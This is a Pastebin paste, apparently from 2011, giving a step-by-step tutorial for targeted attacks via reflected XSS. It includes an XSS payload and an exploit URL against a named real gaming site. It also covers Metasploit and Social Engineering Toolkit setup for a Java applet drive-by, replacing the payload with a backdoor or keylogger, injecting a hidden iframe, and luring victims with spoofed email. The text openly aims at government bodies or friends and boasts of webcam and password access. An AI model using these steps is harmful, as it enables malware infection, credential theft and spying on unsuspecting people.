SHARE
TWEET

Untitled

a guest Jul 10th, 2011 2,305 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Targeted attacks via non-persistant xss
  2. by speakeasy
  3.  
  4. non-persistant XSS attacks can be an extremely effective way to completely take control of a website or server. They are effective because they exploit a weak factor that is present in *every* system - people.
  5.  
  6. This tutorial should give you an introduction to using non persistant xss for targeted attacks, whether it's for attacking goverment organisations, or fucking with your best friend.
  7.  
  8. What you will need:
  9.  
  10. A server with the metasploit framework
  11. The social engineering toolkit also on that server
  12. an apache webserver on that server
  13. a backdoor in an exe format
  14. ssh client (I recommend putty for windows)
  15. sftp client (I recommend filezilla)
  16. common sense
  17.  
  18.  
  19. STEP 1
  20.  
  21. The first thing we need to do is know our victum. Know what he likes and what he dislikes. Know his formal and informal relationships. Know hwho he trusts and distrusts. The process of finding this information is a skill in itself, and there are a number of good tutorials on it.
  22.  
  23. now we need to find a site that we can trick them into visiting, that's vulnerable to an xss. make a list of sites and then copy this string into the search box:
  24.  
  25. “><script>alert(‘xss_here’);</script>
  26.  
  27. i searched for "games" in google, and found an xss in my second site, http://www.addictinggames.com . Unfortunately most browsers filter this, but you should see a warning notice in internet explorer if you are successful,
  28. which can be shown using the url:
  29.  
  30. http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%E2%80%9C%3E%3Cscript%3Ealert%28%E2%80%98xss_here%E2%80%99%29%3B%3C%2Fscript%3E
  31.  
  32. or this screenshot in case it has been fixed:
  33.  
  34. http://i.imgur.com/rKDLr.png
  35.  
  36. Now the problem here his that browsers try to block the scripts we add to prevent cookie theft, but there is an easy way around that: don't use scripts at all!
  37.  
  38. STEP 2
  39.  
  40. I bet you were wondering why we needed that web server, well it's critical to this attack (unless you're attacking someone on your own network)
  41.  
  42. install the metasploit framework and the social engineering toolkit on your server, then ssh in. on my ubuntu server, i can install metasploit with the binary installer like this:
  43.  
  44. wget http://updates.metasploit.com/data/releases/framework-3.7.2-linux-x64-full.run
  45. chmod +x framework-3.7.2-linux-x64-full.run
  46. sudo ./framework-3.7.2-linux-x64-full.run
  47.  
  48. (remeber to use the version appropriate to your system)
  49. via subversion using:
  50.  
  51. svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
  52. cd SET/
  53.  
  54. and run it using:
  55.  
  56. python set
  57.  
  58. although we may need to install python using apt-get install python
  59.  
  60. now that this is set up it's time to get on with the attack. Run the social engineering framework and select:
  61. 2.  Website Attack Vectors
  62. followed by:
  63. 1. The Java Applet Attack Method
  64. then:
  65. 1. Web Templates
  66. and finally:
  67. 1. Java Required
  68.  
  69. and any options you want for creating your metasploit payload, we won't be using it for this tutorial. if you get the error:
  70. [!] Metasploit path not found. Enter path to framework directory:
  71. then you will need to enter the path to the directory where you installed metaploit, and the config file should be automatically updated.
  72.  
  73. there are a couple of things we need to change now, so login with your sftp client.
  74. cd to your webservers root directory (should be /var/www in apache)
  75. edit the index.html file being careful not to ruin the important code, this should be fairly obvious.
  76. in this case we can change the background, fonts and text to make it seem like a game should be here.but requires java, but i will leave mine as it is for this tutorial. The second thing we need to do is change the payload. in apache's root directory there should be a file with a random string of letters. we need to upload our payload (backdoor, keylogger etc) and replace the file on the server with our payload. For this tutorial i will use an exe that pops up a message box saying "you got pwnd" i can visit the site and allow java to get this:
  77.  
  78. http://i.imgur.com/CyHw5.png
  79.  
  80. STEP 3
  81.  
  82. this is where we combine what we have so far. We will use xss to add an iframe into our target page. "><iframe src="http://server" height=? width = ?></iframe>
  83. you can either make the iframe the correct size for a game or map, or you can make it invisible, there is plenty of information about this on the internet.
  84.  
  85. now, enter your iframe code into the server box and copy and paste the link in the top bar
  86. send it to the target via a spoofed email, or pass it to them in conversation.
  87.  
  88. the finished result should have no trouble tricking a user who sees and trusts the sites url especially considering the number of windows we click through without even looking: http://i.imgur.com/ukDzD.png
  89.  
  90. STEP 4:
  91.  
  92. if you installed something good on their computer you now have access to all of their password and private information, as well as their webcam ;), and they probably recently gained a large collection of questionaable pornography.
  93.  
  94. use as you will,
  95. good luck.
  96.  
  97.   _______                       __    
  98.  |   _   |.-----..-----..---.-.|  |--.
  99.  |   1___||  _  ||  -__||  _  ||    <
  100.  |____   ||   __||_____||___._||__|__|
  101.  |:  1   ||__|                        
  102.  |::.. . |      _.._..,_,_                      
  103.  `-------'     (          )
  104.                 ]~,"-.-~~[
  105.               .=])' (;  ([
  106.               | ]:: '    [
  107.               '=]): .)  ([
  108.                 |:: '    |
  109.                  ~~----~~
RAW Paste Data
Top